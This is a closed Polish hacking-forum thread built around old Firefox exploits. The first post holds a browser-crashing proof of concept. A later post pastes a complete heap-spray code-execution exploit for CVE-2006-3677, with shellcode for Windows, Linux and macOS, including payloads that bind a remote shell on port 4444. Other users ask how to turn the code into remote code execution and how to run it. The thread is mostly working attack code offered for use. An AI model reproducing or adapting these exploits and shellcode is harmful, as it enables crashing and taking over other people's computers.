Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) DoS

Status
Zamknięty.
G

globi_

Użytkownik
Dołączył
Maj 4, 2006
Posty
7
Kod: 
<!-- 

--------------------------------------------------- 

Software: 

Firefox Web Browser 

Tested: 

Linux, Windows clients' version 1.5.0.2 

Result: 

Firefox Remote Code Execution and Denial of Service - Vendor contacted, no patch yet. 

Problem: 

A handling issue exists in how Firefox handles certain Javascript in js320.dll and 

xpcom_core.dll 

regarding iframe.contentWindow.focus(). By manipulating this feature a buffer overflow will 

occur. 

Proof of Concept: 

[url]http://www.securident.com/vuln/ff.txt[/url] 

Credits: 

splices(splices [dot] org) 

spiffomatic64(spiffomatic64 [dot] com) 

Securident Technologies (securident [dot] com) 

------------------------------------------------ 



[url]http://www.securident.com/vuln/ffdos.htm[/url] - PoC firefox dos 



Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above. 

--> 



<textarea cols="0" rows="0" id="x_OtherInfo" 

name="x_OtherInfo"></textarea> 

<script> 

var textarea = document.getElementsByName("x_OtherInfo"); 

textarea=textarea.item(0); 

var htmlarea = document.createElement("div"); 

htmlarea.className = "htmlarea"; 

textarea.parentNode.insertBefore(htmlarea, textarea); 

var iframe = document.createElement("iframe"); 

htmlarea.appendChild(iframe); 

var doc = iframe.contentWindow.document; 

doc.designMode = "on"; 

doc.open(); 

doc.write("<iframe src=''>"); 

iframe.contentWindow.focus() 

doc.close(); 

</script> 

</textarea> 



<!-- 

-DISCLAIMER- 

splices,spiffomatic64, and securident are not responsible for any of the information 

contained therein, 

this is all just for informational purposes only. -->
 
C

Czarna Mamba

Użytkownik
Dołączył
Kwiecień 16, 2006
Posty
15
@offtopick hej szukałem tego po tych działach i nieznalazlem prosze cie o link.z góry dziękuje
 
G

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
jeśli chodzi ci o exploit to snajduje sie powyżej. Przyjżyj sie dokładnie
 
S

Snowak

Użytkownik
Dołączył
Listopad 15, 2006
Posty
6
Ktoś wie jak tego używać? żeby zrobić z tego exploit typu Remote Code Execution
 
R

rafal

Były Moderator
Dołączył
Marzec 30, 2005
Posty
392
to jest exploit na DoS'a ... musisz poszukac na milw0rmie jakis na remote
 
S

Snowak

Użytkownik
Dołączył
Listopad 15, 2006
Posty
6
Znalazlem cos takiegp:

<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system.
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is
trivial to turn into a working exploit. The demonstration link below will attempt
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

// Exploit for http://www.mozilla.org/security/announce/2...fsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677

// The Java plugin is required for this to work

// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;

// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;

// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;


// Start the browser detection
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;

if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}

if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}

if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}

if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}

if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}

var b = fill;
while (b.length <= 0x400000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}


if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}

</script>

Clicking the button below may crash your browser!


<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>[/b]
Kliknij aby rozwinąć...


Jak to uzyc? ;s
 
Status
Zamknięty.
Do góry Bottom